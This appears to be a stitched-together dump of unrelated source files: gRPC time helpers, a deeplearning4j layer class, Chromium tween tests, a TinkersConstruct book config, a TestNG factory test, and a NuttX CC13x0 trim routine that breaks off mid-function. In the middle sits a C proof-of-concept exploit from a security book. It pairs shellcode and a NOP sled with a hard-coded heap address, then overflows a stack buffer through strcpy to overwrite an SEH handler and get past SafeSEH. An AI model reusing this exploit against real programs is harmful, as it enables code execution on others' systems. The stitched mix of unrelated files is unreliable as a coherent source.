nanoseconds nsecs = duration_cast<nanoseconds>(deadline - secs);
to->tv_sec = (int64_t)secs.count();
to->tv_nsec = (int32_t)nsecs.count();
to->clock_type = GPR_CLOCK_REALTIME;
}
system_clock::time_point Timespec2Timepoint(gpr_timespec t) {
if (gpr_time_cmp(t, gpr_inf_future(t.clock_type)) == 0) {
return system_clock::time_point::max();
}
t = gpr_convert_clock_type(t, GPR_CLOCK_REALTIME);
system_clock::time_point tp;
tp += duration_cast<system_clock::time_point::duration>(seconds(t.tv_sec));
tp +=
duration_cast<system_clock::time_point::duration>(nanoseconds(t.tv_nsec));
return tp;
}
} // namespace grpc
| 1,001 |
2,206 |
/*
* ******************************************************************************
* *
* *
* * This program and the accompanying materials are made available under the
* * terms of the Apache License, Version 2.0 which is available at
* * https://www.apache.org/licenses/LICENSE-2.0.
* *
* * See the NOTICE file distributed with this work for additional
* * information regarding copyright ownership.
* * Unless required by applicable law or agreed to in writing, software
* * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
* * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
* * License for the specific language governing permissions and limitations
* * under the License.
* *
* * SPDX-License-Identifier: Apache-2.0
* *****************************************************************************
*/
package org.deeplearning4j.nn.modelimport.keras.layers;
import org.deeplearning4j.nn.api.ParamInitializer;
import org.deeplearning4j.nn.conf.GradientNormalization;
import org.deeplearning4j.nn.conf.InputPreProcessor;
import org.deeplearning4j.nn.conf.NeuralNetConfiguration;
import org.deeplearning4j.nn.conf.RNNFormat;
import org.deeplearning4j.nn.conf.inputs.InputType;
import org.deeplearning4j.nn.conf.layers.Layer;
import org.deeplearning4j.nn.conf.memory.LayerMemoryReport;
import org.deeplearning4j.nn.modelimport.keras.layers.TFOpLayerImpl;
import org.deeplearning4j.nn.params.EmptyParamInitializer;
import org.deeplearning4j.optimize.api.TrainingListener;
import org.nd4j.linalg.api.buffer.DataType;
import org.nd4j.linalg.api.ndarray.INDArray;
import org.nd4j.linalg.factory.Nd4j;
import org.nd4j.linalg.learning.regularization.Regularization;
import java.util.Collection;
import java.util.List;
import java.util.Map;
public class TFOpLayer extends Layer {
private Map nodeDef;
private Map constants;
public TFOpLayer(Map nodeDef, Map constants){
super();
this.nodeDef = nodeDef;
this.constants = constants;
}
@Override
public ParamInitializer initializer() {
return EmptyParamInitializer.getInstance();
}
@Override
public InputPreProcessor getPreProcessorForInputType(InputType inputType) {
return null;
}
@Override
public boolean isPretrainParam(String param){
return false;
}
@Override
public InputType getOutputType(int idx, InputType inputType){
long[] shape = inputType.getShape(true);
TFOpLayerImpl tempLayer = new TFOpLayerImpl(nodeDef, constants, null, null);
long[] outputShape = tempLayer.getOutputShape(shape);
if (outputShape.length == 3){
return InputType.recurrent(outputShape[2], outputShape[1], RNNFormat.NWC);
}
return InputType.inferInputType(Nd4j.create(outputShape));
}
@Override
public void setNIn(InputType inputType, boolean override){}
@Override
public GradientNormalization getGradientNormalization(){return null;}
@Override
public org.deeplearning4j.nn.api.Layer instantiate(NeuralNetConfiguration conf,
Collection<TrainingListener> trainingListeners, int layerIndex, INDArray layerParamsView,
boolean initializeParams, DataType networkDataType) {
TFOpLayerImpl tfOpLayerImpl = new TFOpLayerImpl(nodeDef, constants, conf, networkDataType);
tfOpLayerImpl.setListeners(trainingListeners);
tfOpLayerImpl.setIndex(layerIndex);
return tfOpLayerImpl;
}
@Override
public double getGradientNormalizationThreshold(){return 0.;}
@Override
public List<Regularization> getRegularizationByParam(String paramName){return null;}
@Override
public LayerMemoryReport getMemoryReport(InputType inputType) {
return new LayerMemoryReport(); //TODO
}
}
| 1,393 |
2,151 |
<filename>ui/gfx/animation/tween_unittest.cc
// Copyright 2013 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "ui/gfx/animation/tween.h"
#include <math.h>
#include "base/time/time.h"
#include "build/build_config.h"
#include "testing/gtest/include/gtest/gtest.h"
#include "ui/gfx/test/gfx_util.h"
#if defined(OS_WIN)
#include <float.h>
#endif
namespace gfx {
namespace {
double next_double(double d) {
#if defined(OS_WIN)
return _nextafter(d, d + 1);
#else
// Step two units of least precision towards positive infinity. On some 32
// bit x86 compilers a single step was not enough due to loss of precision in
// optimized code.
return nextafter(nextafter(d, d + 1), d + 1);
#endif
}
// Validates that the same interpolations are made as in Blink.
TEST(TweenTest, ColorValueBetween) {
// From blink's AnimatableColorTest.
EXPECT_SKCOLOR_EQ(0xFF00FF00,
Tween::ColorValueBetween(-10.0, 0xFF00FF00, 0xFF00FF00));
EXPECT_SKCOLOR_EQ(0xFF00FF00,
Tween::ColorValueBetween(-10.0, 0xFF00FF00, 0xFFFF00FF));
EXPECT_SKCOLOR_EQ(0xFF00FF00,
Tween::ColorValueBetween(0.0, 0xFF00FF00, 0xFFFF00FF));
EXPECT_SKCOLOR_EQ(0xFF01FE01,
Tween::ColorValueBetween(1.0 / 255, 0xFF00FF00, 0xFFFF00FF));
EXPECT_SKCOLOR_EQ(0xFF808080,
Tween::ColorValueBetween(0.5, 0xFF00FF00, 0xFFFF00FF));
EXPECT_SKCOLOR_EQ(
0xFFFE01FE,
Tween::ColorValueBetween(254.0 / 255.0, 0xFF00FF00, 0xFFFF00FF));
EXPECT_SKCOLOR_EQ(0xFFFF00FF,
Tween::ColorValueBetween(1.0, 0xFF00FF00, 0xFFFF00FF));
EXPECT_SKCOLOR_EQ(0xFFFF00FF,
Tween::ColorValueBetween(10.0, 0xFF00FF00, 0xFFFF00FF));
EXPECT_SKCOLOR_EQ(0xFF0C253E,
Tween::ColorValueBetween(3.0 / 16.0, 0xFF001020, 0xFF4080C0));
EXPECT_SKCOLOR_EQ(0x80FF00FF,
Tween::ColorValueBetween(0.5, 0x0000FF00, 0xFFFF00FF));
EXPECT_SKCOLOR_EQ(0x60AA55AA,
Tween::ColorValueBetween(0.5, 0x4000FF00, 0x80FF00FF));
EXPECT_SKCOLOR_EQ(0x60FFAAFF,
Tween::ColorValueBetween(0.5, 0x40FF00FF, 0x80FFFFFF));
EXPECT_SKCOLOR_EQ(0x103060A0,
Tween::ColorValueBetween(0.5, 0x10204080, 0x104080C0));
}
// Ensures that each of the 3 integers in [0, 1, 2] is selected with equal
// weight.
TEST(TweenTest, IntValueBetween) {
EXPECT_EQ(0, Tween::IntValueBetween(0.0, 0, 2));
EXPECT_EQ(0, Tween::IntValueBetween(0.5 / 3.0, 0, 2));
EXPECT_EQ(0, Tween::IntValueBetween(1.0 / 3.0, 0, 2));
EXPECT_EQ(1, Tween::IntValueBetween(next_double(1.0 / 3.0), 0, 2));
EXPECT_EQ(1, Tween::IntValueBetween(1.5 / 3.0, 0, 2));
EXPECT_EQ(1, Tween::IntValueBetween(2.0 / 3.0, 0, 2));
EXPECT_EQ(2, Tween::IntValueBetween(next_double(2.0 / 3.0), 0, 2));
EXPECT_EQ(2, Tween::IntValueBetween(2.5 / 3.0, 0, 2));
EXPECT_EQ(2, Tween::IntValueBetween(3.0 / 3.0, 0, 2));
}
TEST(TweenTest, IntValueBetweenNegative) {
EXPECT_EQ(-2, Tween::IntValueBetween(0.0, -2, 0));
EXPECT_EQ(-2, Tween::IntValueBetween(0.5 / 3.0, -2, 0));
EXPECT_EQ(-2, Tween::IntValueBetween(1.0 / 3.0, -2, 0));
EXPECT_EQ(-1, Tween::IntValueBetween(next_double(1.0 / 3.0), -2, 0));
EXPECT_EQ(-1, Tween::IntValueBetween(1.5 / 3.0, -2, 0));
EXPECT_EQ(-1, Tween::IntValueBetween(2.0 / 3.0, -2, 0));
EXPECT_EQ(0, Tween::IntValueBetween(next_double(2.0 / 3.0), -2, 0));
EXPECT_EQ(0, Tween::IntValueBetween(2.5 / 3.0, -2, 0));
EXPECT_EQ(0, Tween::IntValueBetween(3.0 / 3.0, -2, 0));
}
TEST(TweenTest, IntValueBetweenReverse) {
EXPECT_EQ(2, Tween::IntValueBetween(0.0, 2, 0));
EXPECT_EQ(2, Tween::IntValueBetween(0.5 / 3.0, 2, 0));
EXPECT_EQ(2, Tween::IntValueBetween(1.0 / 3.0, 2, 0));
EXPECT_EQ(1, Tween::IntValueBetween(next_double(1.0 / 3.0), 2, 0));
EXPECT_EQ(1, Tween::IntValueBetween(1.5 / 3.0, 2, 0));
EXPECT_EQ(1, Tween::IntValueBetween(2.0 / 3.0, 2, 0));
EXPECT_EQ(0, Tween::IntValueBetween(next_double(2.0 / 3.0), 2, 0));
EXPECT_EQ(0, Tween::IntValueBetween(2.5 / 3.0, 2, 0));
EXPECT_EQ(0, Tween::IntValueBetween(3.0 / 3.0, 2, 0));
}
TEST(TweenTest, LinearIntValueBetween) {
EXPECT_EQ(0, Tween::LinearIntValueBetween(0.0, 0, 2));
EXPECT_EQ(0, Tween::LinearIntValueBetween(0.5 / 4.0, 0, 2));
EXPECT_EQ(0, Tween::LinearIntValueBetween(0.99 / 4.0, 0, 2));
EXPECT_EQ(1, Tween::LinearIntValueBetween(1.0 / 4.0, 0, 2));
EXPECT_EQ(1, Tween::LinearIntValueBetween(1.5 / 4.0, 0, 2));
EXPECT_EQ(1, Tween::LinearIntValueBetween(2.0 / 4.0, 0, 2));
EXPECT_EQ(1, Tween::LinearIntValueBetween(2.5 / 4.0, 0, 2));
EXPECT_EQ(1, Tween::LinearIntValueBetween(2.99 / 4.0, 0, 2));
EXPECT_EQ(2, Tween::LinearIntValueBetween(3.0 / 4.0, 0, 2));
EXPECT_EQ(2, Tween::LinearIntValueBetween(3.5 / 4.0, 0, 2));
EXPECT_EQ(2, Tween::LinearIntValueBetween(4.0 / 4.0, 0, 2));
}
TEST(TweenTest, LinearIntValueBetweenNegative) {
EXPECT_EQ(-2, Tween::LinearIntValueBetween(0.0, -2, 0));
EXPECT_EQ(-2, Tween::LinearIntValueBetween(0.5 / 4.0, -2, 0));
EXPECT_EQ(-2, Tween::LinearIntValueBetween(0.99 / 4.0, -2, 0));
EXPECT_EQ(-1, Tween::LinearIntValueBetween(1.0 / 4.0, -2, 0));
EXPECT_EQ(-1, Tween::LinearIntValueBetween(1.5 / 4.0, -2, 0));
EXPECT_EQ(-1, Tween::LinearIntValueBetween(2.0 / 4.0, -2, 0));
EXPECT_EQ(-1, Tween::LinearIntValueBetween(2.5 / 4.0, -2, 0));
EXPECT_EQ(-1, Tween::LinearIntValueBetween(2.99 / 4.0, -2, 0));
EXPECT_EQ(0, Tween::LinearIntValueBetween(3.0 / 4.0, -2, 0));
EXPECT_EQ(0, Tween::LinearIntValueBetween(3.5 / 4.0, -2, 0));
EXPECT_EQ(0, Tween::LinearIntValueBetween(4.0 / 4.0, -2, 0));
}
TEST(TweenTest, ClampedFloatValueBetweenTimeTicks) {
const float v1 = 10.0f;
const float v2 = 20.0f;
const auto t0 = base::TimeTicks();
base::TimeTicks from = t0 + base::TimeDelta::FromSecondsD(1);
base::TimeTicks to = t0 + base::TimeDelta::FromSecondsD(2);
base::TimeTicks t_before = t0 + base::TimeDelta::FromSecondsD(0.9);
base::TimeTicks t_between = t0 + base::TimeDelta::FromSecondsD(1.6);
base::TimeTicks t_after = t0 + base::TimeDelta::FromSecondsD(2.2);
EXPECT_EQ(v1, Tween::ClampedFloatValueBetween(t_before, from, v1, to, v2));
EXPECT_EQ(16.0, Tween::ClampedFloatValueBetween(t_between, from, v1, to, v2));
EXPECT_EQ(v2, Tween::ClampedFloatValueBetween(t_after, from, v1, to, v2));
}
TEST(TweenTest, SizeValueBetween) {
const gfx::SizeF s1(12.0f, 24.0f);
const gfx::SizeF s2(36.0f, 48.0f);
double before = -0.125;
double from = 0.0;
double between = 0.5;
double to = 1.0;
double after = 1.125;
EXPECT_SIZEF_EQ(gfx::SizeF(9.0f, 21.0f),
Tween::SizeValueBetween(before, s1, s2));
EXPECT_SIZEF_EQ(s1, Tween::SizeValueBetween(from, s1, s2));
EXPECT_SIZEF_EQ(gfx::SizeF(24.0f, 36.0f),
Tween::SizeValueBetween(between, s1, s2));
EXPECT_SIZEF_EQ(s2, Tween::SizeValueBetween(to, s1, s2));
EXPECT_SIZEF_EQ(gfx::SizeF(39.0f, 51.0f),
Tween::SizeValueBetween(after, s1, s2));
}
TEST(TweenTest, SizeValueBetweenClampedExtrapolation) {
const gfx::SizeF s1(0.0f, 0.0f);
const gfx::SizeF s2(36.0f, 48.0f);
double before = -1.0f;
// We should not extrapolate in this case as it would result in a negative and
// invalid size.
EXPECT_SIZEF_EQ(s1, Tween::SizeValueBetween(before, s1, s2));
}
} // namespace
} // namespace gfx
| 3,494 |
938 |
<reponame>brickviking/TinkersConstruct
{
"coverTexture": "tconstruct:book/images/covers/materials_and_you_cover.png",
"coverColor": -1,
"bookTexture": "tconstruct:book/images/covers/materials_and_you_pages.png",
"arrowColor": -1,
"slotColor": 0xE5C682,
"drawSectionListText": true,
"largePageTitles": false,
"centerPageTitles": true
}
| 135 |
640 |
/*****************************************************************************
To be the apostrophe which changed "Impossible" into "I'm possible"!
POC code of chapter 11 in book "Bypass SafeSEH by jumping into heap"
file name : SEH_Heap.cpp
author : zihan
date : 2010.04.02
description  : demo of how to bypass SafeSEH by jumping into the heap
Notice       : 1 compiled with VS 2008
2 disable optimization
3 build into release version
               4 SEH offset and shellcode address may need
                 to be verified via runtime debugging
version : 1.0
E-mail : <EMAIL>
Only for educational purposes enjoy the fun from exploiting :)
******************************************************************************/
#include <stdafx.h>
#include <stdlib.h>
#include <string.h>
char shellcode[]=
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xA0\x29\x39\x00"//address of shellcode in heap
;
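// Rough flow of the demo below (descriptive summary, added for clarity):
// main() copies the payload into a 500-byte heap buffer, so a second copy of
// the shellcode lives at a (hard-coded, build-dependent) heap address. test()
// then strcpy()s the same oversized payload into the 200-byte stack buffer
// `str`, overrunning it so that the trailing 4 bytes ("\xA0\x29\x39\x00")
// overwrite the exception handler pointer of the SEH record on the stack.
// The deliberate divide-by-zero raises an exception and control transfers to
// the overwritten handler, which points into the heap copy of the shellcode.
// Because that address lies outside any loaded module image, it can pass the
// SafeSEH handler validation on the configurations targeted by this chapter.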
void test(char * input)
{
char str[200];
strcpy(str,input);
int zero=0;
zero=1/zero;
}
void main()
{
char * buf=(char *)malloc(500);
//__asm int 3
strcpy(buf,shellcode);
test(shellcode);
}
| 1,437 |
1,540 |
package test.morten;
import org.testng.annotations.Factory;
import org.testng.annotations.Test;
public class SampleTest {
private int capacity = 10;
private float loadFactor = 0.3f;
public class SampleTestTestFactory {
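        // TestNG calls the @Factory method below to build the actual test
        // instances, so testPut() runs once for each (capacity, loadFactor)
        // pair returned here rather than on the default instance.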
        public SampleTestTestFactory() {} // Is this constructor necessary?
@Factory
public Object[] createInstances() {
return new SampleTest[] {
new SampleTest(1, 0.1f), new SampleTest(10, 0.5f),
};
}
}
public SampleTest() {}
public SampleTest(int capacity, float loadFactor) {
System.out.println("CREATING TEST WITH " + capacity);
this.capacity = capacity;
this.loadFactor = loadFactor;
}
@Test
public void testPut() {
// FIXME: This test does nothing
// HashMap hashTable = new HashMap(capacity, loadFactor);
// ...
}
}
| 276 |
1,006 |
<reponame>eenurkka/incubator-nuttx
/****************************************************************************
* arch/arm/src/tiva/cc13xx/cc13x0_trim.c
*
* Copyright (C) 2019 <NAME>. All rights reserved.
* Author: <NAME> <<EMAIL>>
*
* This is a port of TI's setup.c file (revision 49363) which has a fully
* compatible BSD license:
*
* Copyright (c) 2015-2017, Texas Instruments Incorporated
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are
* met:
*
* 1) Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
*
* 2) Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
*
* 3) Neither the name NuttX nor the names of its contributors may be used to
* endorse or promote products derived from this software without specific
* prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
* "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
* TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
* PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR
* CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
* EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
* PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
* PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
* LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
* NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
* SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*
****************************************************************************/
/****************************************************************************
* Included Files
****************************************************************************/
#include <nuttx/config.h>
#include "tiva_chipinfo.h"
#include "hardware/tiva_adi2_refsys.h"
#include "hardware/tiva_adi3_refsys.h"
#include "hardware/tiva_aon_ioc.h"
#include "hardware/tiva_aon_sysctl.h"
#include "hardware/tiva_aon_wuc.h"
#include "hardware/tiva_aux_wuc.h"
#include "hardware/tiva_ccfg.h"
#include "hardware/tiva_fcfg1.h"
#include "hardware/tiva_flash.h"
#include "hardware/tiva_prcm.h"
#include "hardware/tiva_vims.h"
#include "cc13xx/cc13x0_rom.h"
/****************************************************************************
* Private Functions
****************************************************************************/
/****************************************************************************
* Name: trim_wakeup_frompowerdown
*
* Description:
* Trims to be applied when coming from POWER_DOWN (also called when
* coming from SHUTDOWN and PIN_RESET).
*
* Returned Value:
* None
*
****************************************************************************/
static void trim_wakeup_frompowerdown(void)
{
/* Currently no specific trim for Powerdown */
}
/****************************************************************************
* Name: trim_wakeup_fromshutdown
*
* Description:
* Trims to be applied when coming from SHUTDOWN (also called when
* coming from PIN_RESET).
*
* Input Parameters:
* fcfg1_revision
*
* Returned Value:
* None
*
****************************************************************************/
static void trim_wakeup_fromshutdown(uint32_t fcfg1_revision)
{
uint32_t ccfg_modeconf;
uint32_t mp1rev;
uint32_t regval;
  /* Force AUX on and enable clocks. No need to save the current status of the
* power/clock registers. At this point both AUX and AON should have been
* reset to 0x0.
*/
putreg32(AON_WUC_AUXCTL_AUX_FORCE_ON, TIVA_AON_WUC_AUXCTL);
  /* Wait for the AUX domain to power on */
while ((getreg32(TIVA_AON_WUC_PWRSTAT) & AON_WUC_PWRSTAT_AUX_PD_ON) == 0)
{
}
/* Enable the clocks for AUX_DDI0_OSC and AUX_ADI4 */
putreg32(AUX_WUC_MODCLKEN0_AUX_DDI0_OSC | AUX_WUC_MODCLKEN0_AUX_ADI4,
TIVA_AUX_WUC_MODCLKEN0);
/* Check in CCFG for alternative DCDC setting */
if ((getreg32(TIVA_CCFG_SIZE_AND_DIS_FLAGS) &
CCFG_SIZE_AND_DIS_FLAGS_DIS_ALT_DCDC_SETTING) == 0)
{
/* ADI3_REFSYS:DCDCCTL5[3] (=DITHER_EN) = CCFG_MODE_CONF_1[19]
* (=ALT_DCDC_DITHER_EN) ADI3_REFSYS:DCDCCTL5[2:0](=IPEAK ) =
* CCFG_MODE_CONF_1[18:16](=ALT_DCDC_IPEAK )
* Using a single 4-bit masked write since layout is equal for
* both source and destination
*/
regval = getreg32(TIVA_CCFG_MODE_CONF_1);
regval = (0xf0 | (regval >> CCFG_MODE_CONF_1_ALT_DCDC_IPEAK_SHIFT));
putreg8((uint8_t)regval,
TIVA_ADI3_REFSYS_MASK4B +
(TIVA_ADI3_REFSYS_DCDCCTL5_OFFSET * 2));
}
/* Enable for JTAG to be powered down. The JTAG domain is automatically
* powered up on if a debugger is connected. If a debugger is not
* connected this function can be used to power off the JTAG domain.
* Achieving the lowest power modes (shutdown/powerdown) requires the
* JTAG domain to be turned off. In general the JTAG domain should never
* be powered in production code.
*
* NOTE: This logic comes from the aon_wuc.h header file in the TI
* DriverLib.
*/
putreg32(0, TIVA_AON_WUC_JTAGCFG);
/* read the MODE_CONF register in CCFG */
ccfg_modeconf = getreg32(TIVA_CCFG_MODE_CONF);
/* First part of trim done after cold reset and wakeup from shutdown:
* -Configure cc13x0 boost mode. -Adjust the VDDR_TRIM_SLEEP value.
* -Configure DCDC.
*/
rom_setup_coldreset_from_shutdown_cfg1(ccfg_modeconf);
/* Second part of trim done after cold reset and wakeup from shutdown:
* -Configure XOSC.
*/
rom_setup_coldreset_from_shutdown_cfg2(fcfg1_revision, ccfg_modeconf);
/* Increased margin between digital supply voltage and VDD BOD during
* standby.
* VTRIM_UDIG: signed 4 bits value to be incremented by 2 (max = 7)
* VTRIM_BOD: unsigned 4 bits value to be decremented by 1 (min = 0) This
* applies to chips with mp1rev < 542 for cc13x0 and for mp1rev < 527 for
* cc26x0
*/
mp1rev = ((getreg32(TIVA_FCFG1_TRIM_CAL_REVISION) &
FCFG1_TRIM_CAL_REVISION_MP1_MASK) >>
FCFG1_TRIM_CAL_REVISION_MP1_SHIFT);
if (mp1rev < 542)
{
uint32_t ldo_trim_reg = getreg32(TIVA_FCFG1_BAT_RC_LDO_TRIM);
uint32_t vtrim_bod;
uint32_t vtrim_udig;
uint8_t regval8;
/* bit[27:24] unsigned */
vtrim_bod = ((ldo_trim_reg & FCFG1_BAT_RC_LDO_TRIM_VTRIM_BOD_MASK) >>
FCFG1_BAT_RC_LDO_TRIM_VTRIM_BOD_SHIFT);
/* bit[19:16] signed but treated as unsigned */
vtrim_udig = ((ldo_trim_reg & FCFG1_BAT_RC_LDO_TRIM_VTRIM_UDIG_MASK) >>
FCFG1_BAT_RC_LDO_TRIM_VTRIM_UDIG_SHIFT);
if (vtrim_bod > 0)
{
vtrim_bod -= 1;
}
if (vtrim_udig != 7)
{
if (vtrim_udig == 6)
{
vtrim_udig = 7;
}
else
{
vtrim_udig = ((vtrim_udig + 2) & 0xf);
}
}
regval8 = (vtrim_udig << ADI2_REFSYS_SOCLDOCTL0_VTRIM_UDIG_SHIFT) |
(vtrim_bod << ADI2_REFSYS_SOCLDOCTL0_VTRIM_BOD_SHIFT);
putreg8(regval8, TIVA_ADI2_REFSYS_SOCLDOCTL0);
}
/* Third part of trim done after cold reset and wakeup from shutdown:
* -Configure HPOSC. -Setup the LF clock.
*/
rom_setup_coldreset_from_shutdown_cfg3(ccfg_modeconf);
/* Allow AUX to power down */
rom_aonwuc_powerctrl(AUX_WUC_POWER_DOWN);
/* Leaving on AUX and clock for AUX_DDI0_OSC on but turn off clock for
* AUX_ADI4
*/
putreg32(AUX_WUC_MODCLKEN0_AUX_DDI0_OSC, TIVA_AUX_WUC_MODCLKEN0);
/* Disable EFUSE clock */
regval = getreg32(TIVA_FLASH_CFG);
regval |= FLASH_CFG_DIS_EFUSECLK;
putreg32(regval, TIVA_FLASH_CFG);
}
/****************************************************************************
* Name: trim_coldreset
*
* Description:
* Trims to be applied when coming from PIN_RESET.
*
* Returned Value:
* None
*
****************************************************************************/
static void trim_coldreset(void)
{
/* Currently no specific trim for Cold Reset */
}
/****************************************************************************
* Public Functions
****************************************************************************/
/****************************************************************************
* Name: cc13xx_trim_device
*
* Description:
* Perform the necessary trim of the device which is not done in boot code
*
* This function should only execute coming from ROM boot. The current
* implementation does not take soft reset into account. However, it does
* no damage to execute it again. It only consumes time.
*
****************************************************************************/
void cc13xx_trim_device(void)
{
uint32_t fcfg1_revision;
uint32_t aon_sysresetctrl;
uint32_t regval;
/* Get layout revision of the factory configuration area (Handle undefined
* revision as revision = 0)
*/
fcfg1_revision = getreg32(TIVA_FCFG1_FCFG1_REVISION);
if (fcfg1_revision == 0xffffffff)
{
fcfg1_revision = 0;
}
/* This setup file is for CC13x0 PG2.0 and later. Halt if violated */
chipinfo_verify();
/* Enable standby in flash bank */
regval = getreg32(TIVA_FLASH_CFG);
regval &= ~FLASH_CFG_DIS_STANDBY;
putreg32(regval, TIVA_FLASH_CFG);
/* Clock must always be enabled for the semaphore module (due to ADI/DDI HW
* workaround)
*/
putreg32(AUX_WUC_MODCLKEN1_SMPH, TIVA_AUX_WUC_MODCLKEN1);
  /* Warm resets on CC13x0 and CC26x0 complicate software design because
   * much of our software expects that initialization is done from a full
* system reset. This includes RTC setup, oscillator configuration and
* AUX setup. To ensure a full reset of the device is done when customers
* get e.g. a Watchdog reset, the following is set here:
*/
regval = getreg32(TIVA_PRCM_WARMRESET);
regval |= PRCM_WARMRESET_WRTO_PINRESET;
putreg32(regval, TIVA_PRCM_WARMRESET);
/* Select correct CACHE mode and set correct CACHE configuration */
rom_setup_cachemode();
/* 1. Check for powerdown
* 2. Check for shutdown
* 3. Assume cold reset if none of the above.
*
* It is always assumed that the application will freeze the latches in
* AON_IOC when going to powerdown in order to retain the values on the
* IOs. NB. If this bit is not cleared before proceeding to powerdown,
* the IOs will all default to the reset configuration when
* restarting.
*/
if ((getreg32(TIVA_AON_IOC_IOCLATCH) & AON_IOC_IOCLATCH_EN) == 0)
{
/* NB. This should be calling a ROM implementation of required trim and
* compensation e.g. trim_wakeup_frompowerdown()
*/
trim_wakeup_frompowerdown();
}
/* Check for shutdown.
   * When the device is going to shut down, the hardware will automatically clear
* the SLEEPDIS bit in the SLEEP register in the AON_SYSCTL module.
* It is left for the application to assert this bit when waking back
* up, but not before the desired IO configuration has been re-established.
*/
else if ((getreg32(TIVA_AON_SYSCTL_SLEEPCTL) &
AON_SYSCTL_SLEEPCTL_IO_PAD_SLEEP_DIS) == 0)
{
/* NB. This should be calling a ROM implementation of required trim and
* compensation e.g. trim_wakeup_fromshutdown() -->
* trim_wakeup_frompowerdown();
*/
trim_wakeup_fromshutdown(fcfg1_revision);
trim_wakeup_frompowerdown();
}
else
{
/* Consider adding a check for soft reset to allow debugging to skip
* this section!!! NB. This should be calling a ROM implementation of
* required trim and compensation e.g. trim_coldreset() -->
* trim_wakeup_fromshutdown() --> trim_wakeup_frompowerdown()
*/
trim_coldreset();
trim_wakeup_fromshutdown(fcfg1_revision);
trim_wakeup_frompowerdown();
}
/* Set VIMS power domain control. PDCTL1VIMS = 0 ==> VIMS power domain is
* only powered when CPU power domain is powered
*/
putreg32(0, TIVA_PRCM_PDCTL1VIMS);
/* Configure optimal wait time for flash FSM in cases where flash pump
* wakes up from sleep
*/
regval = getreg32(TIVA_FLASH_FPAC1);
regval &= ~FLASH_FPAC1_PSLEEPTDIS_MASK;
regval |= (0x139 << FLASH_FPAC1_PSLEEPTDIS_SHIFT);
putreg32(regval, TIVA_FLASH_FPAC1);
/* And finally at the end of the flash boot process: SET BOOT_DET bits in
* AON_SYSCTL to 3 if already found to be 1 Note: The BOOT_DET_x_CLR/SET
* bits must be manually cleared
*/
if ((getreg32(TIVA_AON_SYSCTL_RESETCTL) &
(AON_SYSCTL_RESETCTL_BOOT_DET_1 | AON_SYSCTL_RESETCTL_BOOT_DET_0))
== AON_SYSCTL_RESETCTL_BOOT_DET_0)
{
aon_sysresetctrl = getreg32(TIVA_AON_SYSCTL_RESETCTL);
aon_sysresetctrl &= ~(AON_SYSCTL_RESETCTL_BOOT_DET_1_CLR |
AON_SYSCTL_RESETCTL_BOOT_DET_0_CLR |
AON_SYSCTL_RESETCTL_BOOT_DET_1_SET |
AON_SYSCTL_RESETCTL_BOOT_DET_0_SET);
putreg32(aon_sysresetctrl | AON_SYSCTL_RESETCTL_BOOT_DET_1_SET,
TIVA_AON_SYSCTL_RESETCTL);
putreg32(aon_sysresetctrl, TIVA_AON_SYSCTL_RESETCTL);
}
/* Make sure there are no ongoing VIMS mode change when leaving
* cc13x0_trim_device() (There should typically be no wait time here, but
* need to be sure)
*/
